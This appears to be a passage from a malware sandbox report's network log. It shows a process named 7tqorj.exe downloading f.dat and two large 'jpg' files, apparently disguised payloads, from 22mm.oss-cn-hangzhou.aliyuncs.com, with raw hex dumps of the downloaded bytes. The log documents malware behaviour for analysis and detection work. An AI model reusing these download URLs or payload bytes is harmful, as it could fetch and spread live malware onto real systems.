                                                  2025-01-06 03:51:15 UTC4096INData Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe
                                                  Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhij*Jpqrs<Syz{4s%~}k*yxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
                                                  2025-01-06 03:51:15 UTC955INData Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20
                                                  Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8*Sp1l_g;#c!;3c"#%+''&k*+-#//>S235-77


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.649993118.178.60.94433476C:\Users\user\Documents\7tqorj.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-06 03:51:18 UTC110OUTGET /f.dat HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-06 03:51:18 UTC558INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Mon, 06 Jan 2025 03:51:18 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 879
                                                  Connection: close
                                                  x-oss-request-id: 677B53366A91E5373937C082
                                                  Accept-Ranges: bytes
                                                  ETag: "E54C4296F011EC91D935AA353C936E34"
                                                  Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 11142793972884948456
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000113
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: 5UxClvAR7JHZNao1PJNuNA==
                                                  x-oss-server-time: 5
                                                  2025-01-06 03:51:18 UTC879INData Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31
                                                  Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.649994118.178.60.94433476C:\Users\user\Documents\7tqorj.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-06 03:51:20 UTC115OUTGET /FOM-50.jpg HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-06 03:51:20 UTC546INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Mon, 06 Jan 2025 03:51:20 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 55085
                                                  Connection: close
                                                  x-oss-request-id: 677B5338EE85213732875D3C
                                                  Accept-Ranges: bytes
                                                  ETag: "DC44AE348E6A74B3A74871020FDFAC74"
                                                  Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 12339968747348072397
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000105
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: 3ESuNI5qdLOnSHECD9+sdA==
                                                  x-oss-server-time: 5
                                                  2025-01-06 03:51:20 UTC3550INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                  Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                  2025-01-06 03:51:20 UTC4096INData Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96
                                                  Data Ascii: |{Atwutse>4HYAVVSRt2Q|(M8B&0:**)TW"TDn*2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
                                                  2025-01-06 03:51:20 UTC4096INData Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81
                                                  Data Ascii: FG*2<L\"h((JIr0SCF4=8;987@3A>s](Sn*&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
                                                  2025-01-06 03:51:20 UTC4096INData Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4
                                                  Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn*{75|?flLOIVw)`]b* hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
                                                  2025-01-06 03:51:20 UTC4096INData Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1
                                                  Data Ascii: xryQGT*_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALr*i.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{|}{
                                                  2025-01-06 03:51:20 UTC4096INData Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47
                                                  Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6*:9FQ4( "pI$et)3q}Y/I*Z!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
                                                  2025-01-06 03:51:20 UTC4096INData Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a
                                                  Data Ascii: yv#{wofKlY%'\*JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u*`vRP;\Xf b$*m*-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
                                                  2025-01-06 03:51:20 UTC4096INData Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5
                                                  Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
                                                  2025-01-06 03:51:20 UTC4096INData Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81
                                                  Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-*C.G!"#$g()*+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{|
                                                  2025-01-06 03:51:20 UTC4096INData Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91
                                                  Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~o


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.649995118.178.60.94433476C:\Users\user\Documents\7tqorj.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-06 03:51:21 UTC115OUTGET /FOM-51.jpg HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-06 03:51:22 UTC548INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Mon, 06 Jan 2025 03:51:22 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 4859125
                                                  Connection: close
                                                  x-oss-request-id: 677B533A3D53853135278B2D
                                                  Accept-Ranges: bytes
                                                  ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02"
                                                  Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 9060732723227198118
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000105
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: 7myj7qf5scgQWa71cKKMAg==
                                                  x-oss-server-time: 11
                                                  2025-01-06 03:51:22 UTC3548INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                  Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                  2025-01-06 03:51:22 UTC4096INData Raw: 42 cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66
                                                  Data Ascii: B;K5Aat=BGjD=|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@|-$XW9!][b-I^pHcf
                                                  2025-01-06 03:51:22 UTC4096INData Raw: 55 c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14
                                                  Data Ascii: Uxd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
                                                  2025-01-06 03:51:22 UTC4096INData Raw: 45 e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c
                                                  Data Ascii: E^h0X<LU)dF]:ywSDJu*7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD|T#c-Cpk*^0ncLhz43h\`/k?_wE\
                                                  2025-01-06 03:51:22 UTC4096INData Raw: c3 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 